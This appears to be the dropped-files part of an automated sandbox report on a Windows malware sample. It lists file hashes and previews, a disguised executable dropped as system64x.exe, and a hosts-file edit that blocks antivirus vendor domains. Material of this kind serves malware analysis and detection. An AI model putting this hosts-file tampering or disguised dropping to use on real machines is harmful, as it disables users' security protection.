                                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...V3be.........."......~...J+.....@..........@.............................0,...........`.....................................................<.............+.............. ,.x...............................(.......8..............p............................text....}.......~.................. ..`.rdata........... ..................@..@.data...@2+......"+.................@....pdata........+.......+.............@..@.00cfg........,.......+.............@..@.tls..........,.......+.............@....reloc..x.... ,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):4757
                                                                        Entropy (8bit):5.363658266795526
                                                                        Encrypted:false
                                                                        SSDEEP:96:iqbYqGSI6ogwmj0q0ajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWi/:iqbYqGcLwmj0qjIzQ0JyZtzHeqKkCq1B
                                                                        MD5:73CA263A853CB35DB929B19BC593A5C4
                                                                        SHA1:01F272ED7D5A6AFEB3376C700F1887E686FE5127
                                                                        SHA-256:969C451B86A8874F3549CEB55D6A07D6C6C86A861AA027567B3EEF86E4483CCC
                                                                        SHA-512:29BF55FF62CFDB46899DC1C053122DDC3A17E13F5174420B5C39B71121FD0EA8247DC4C180317838ABD7817D3E896D238875CA1803F23519E5C39E8F6E56F7B6
                                                                        Malicious:true
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                        MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                        SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                        SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                        SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                        Malicious:false
                                                                        Preview:@...e.................................^..............@..........

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byrmvkjw.o2a.ps1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewk25go3.elr.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naaqlpms.sxr.psm1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhgu5k4m.ff1.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3per4eq.d54.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pcdi2n21.x0u.psm1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5hfiz3n.jvw.ps1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tukswsi0.0dq.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\SysWOW64\system64x.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2870272
                                                                        Entropy (8bit):6.525182750076353
                                                                        Encrypted:false
                                                                        SSDEEP:49152:fcFa11QV8HUsmZ00Mtju4/+Kej4Oehz0EA7GHk2D/CiVr8KmPfj7G4Lxec+DA:UA1ItsmZ00MBu4Ies7Gj/CAYKsrdFecD
                                                                        MD5:4471F946569BFA17D68108068D7A17A1
                                                                        SHA1:E16A100F0B1052120B13FFE59EF0E6A8DCFB0160
                                                                        SHA-256:CAD52FAF41B806A22F502E1937ED72637D013C3C964404D448FA7A5C0E48E56C
                                                                        SHA-512:F2ADC61D04F6B6792AD37E2230D7CCEBB6090B45423E95BB21D5BCEE09304A3203F15A9CEAE39E6E1537F035E79F1DDA3B8FC93D03F6984C6260044ED046BC17
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...V3be.........."......~...J+.....@..........@.............................0,...........`.....................................................<.............+.............. ,.x...............................(.......8..............p............................text....}.......~.................. ..`.rdata........... ..................@..@.data...@2+......"+.................@....pdata........+.......+.............@..@.00cfg........,.......+.............@..@.tls..........,.......+.............@....reloc..x.... ,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                        MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                        SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                        SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                        SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                        Malicious:false
                                                                        Preview:@...e.................................:..............@..........

                                                                        C:\Windows\System32\drivers\etc\hosts

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\system64x.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):877
                                                                        Entropy (8bit):4.691701573319544
                                                                        Encrypted:false
                                                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtvC:vDZhyoZWM9rU5fFceC
                                                                        MD5:482630DE1D93C83F5A9381F85F638DC6
                                                                        SHA1:BF4274FD755DA85041D43AEE02AEC7727A1D531A
                                                                        SHA-256:CA8A2839801616AE1BA3F4F10CEF264EB17D83684433C0D7251BD101A6F35BEE
                                                                        SHA-512:9D82D8662D1EAB19E34C6300BEA534291BEEFC8B2774381C6F2E0ACC495755D67A30E38B28458B76C15471DDB88F1A30B267AA944E80D575D968162F8E742770
                                                                        Malicious:true
                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 www.avast.com kaspersky.com safing.io

                                                                        C:\Windows\System32\perfc009.dat

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):129304
                                                                        Entropy (8bit):3.4053644175972018
                                                                        Encrypted:false
                                                                        SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRto:XBnfw8ld9+mRDaUR28oV7TY+7S0bS
                                                                        MD5:9AF42BB696EFC1BBDD22EE27988B26DE
                                                                        SHA1:EC894667C90179CB8EE7EA08B39974EB30984877
                                                                        SHA-256:06F0E20AA133D253C6F1551A7DEE48A9BDE83FE54DBA2EEF81EC7A20B5D7862F
                                                                        SHA-512:39A07E7F021015D49C57672B92A39ABBEA59F33E025792FE83F73E5AF6DC31F1DB0F85D58CDC2C10E8ED50026B6A743207E4587EBED75A0B7C7625EABEB333DC
                                                                        Malicious:false
                                                                        Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

                                                                        C:\Windows\System32\perfh009.dat

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):697270
                                                                        Entropy (8bit):3.2735341717803963
                                                                        Encrypted:false
                                                                        SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRj:78M6d0w+WB62
                                                                        MD5:DD78C325FDB07A0714C016FD6FE034CA
                                                                        SHA1:A7758E36212A446040010A0A5A34DBCF2B822394
                                                                        SHA-256:E146AD67B5E4CB731007F1AB70191C5AE0BA835E25E10F1D4BB61C7AA8459B42
                                                                        SHA-512:EDDC0D47A747CB95EFF9B1721D12C53077A4C6F7E1395647AF6B8F83926B627EA67B477F4B0FD5ADFE364D8E852C0FAA55665E104D9B6E91391A9F0DC5D7622C
                                                                        Malicious:false
                                                                        Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

                                                                        C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3444
                                                                        Entropy (8bit):5.011954215267298
                                                                        Encrypted:false
                                                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                        MD5:B133A676D139032A27DE3D9619E70091
                                                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                        Malicious:false
                                                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                                                        C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                                                                        Download File
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):48786
                                                                        Entropy (8bit):3.5854495362228453
                                                                        Encrypted:false
                                                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                        Malicious:false
                                                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                                                        C:\Windows\System32\winevt\Logs\Application.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):67888
                                                                        Entropy (8bit):4.041371331324477
                                                                        Encrypted:false
                                                                        SSDEEP:768:mTBTdqsqbqwc0bzq0YAKP5goweUe3FdJxPBuwDt/K1WocwKb:SRAciNXKP4CDPBuwDt/K1hcP
                                                                        MD5:7E63E60E73966F738E46ADFEBB7EC310
                                                                        SHA1:676DEE7A03A468FF20060051B981BE7869580D09
                                                                        SHA-256:FF0B4DCBCD44BDD2B6FF783E8E448A64E8CBB82CDF85F7E9F8C8ED2CBFD7821D
                                                                        SHA-512:750770BBFF5C0752992AABE830C0F3A47470F38453A8168159D5E12988C5A6D809AE1908E3A57B3C33EBE80A751F08E2EF78CFC01A6C6044ECC64DEC6D9A2F6A
                                                                        Malicious:false
                                                                        Preview:ElfChnk.................c.......c...............0....X.[.......................................................................3................i...........................=...................................................................................r...................................t...?...........................................F...................M...5...........................B.......................................................................................................&...............**..0...c........,..6.............&............i.Po.F.."..y.......A..m...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..2............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.A.P.I.2.F........)...G.u.i.d.....&.{.5.b.b.c.a.4.a.8.-.b.2.0.9.-.4.8.d.c.-.a.8.c.7.-.b.2.3.d.3.e.5.2.1.6.f.b.}.

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.1181568235432175
                                                                        Encrypted:false
                                                                        SSDEEP:768:SVUHiapX7xadptrDT9W84bW664k5Xyvk:tHi6xadptrX9WPbR
                                                                        MD5:84BCF1D7EB2D62CC778C0DB8249B87DB
                                                                        SHA1:EE2212E946036E8B01666139C57A6988A3D75FA3
                                                                        SHA-256:D63850291791C5D70146A73BBFDE5E06ACE32D33229D74165C8B9B78F77EDD3F
                                                                        SHA-512:0B631AAB097CA90C7E36F074EEB2064D12DA2D58185F23CD21517086778732ABB73C674A94F15D80FECDE612EE82A598DF8546E9C0D7FECA970E0002CFE4AC2B
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........S...............S...................v........................................................................]................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.4013147639327475
                                                                        Encrypted:false
                                                                        SSDEEP:384:FhGN+3N6sNSNYNLNjNUSNbN6NHNRNbNYN0NsNZN7NhNLNPNhN8NdNixNAwNioNZs:FGvsbF1QBjr1xCKuL48fpoQ
                                                                        MD5:D352D15D6A29EC818FCCB7D131D827B4
                                                                        SHA1:E83944244EF8A5B84B6A8DF486A5A5801937ED51
                                                                        SHA-256:B57978A9C8C8B8D8DF2EC5AAE442504C7327951A2602CD8322378EB9E6AC0D57
                                                                        SHA-512:CF9CDEAE9F69A19E36214B4C29D9C319B231675CD5B4B3A7BAC8F1EE23FFDB06E8E4188E0309A2B710EA1AC8948F72ED4EC7CA8209FA7C0255E1C3BA4614E959
                                                                        Malicious:false
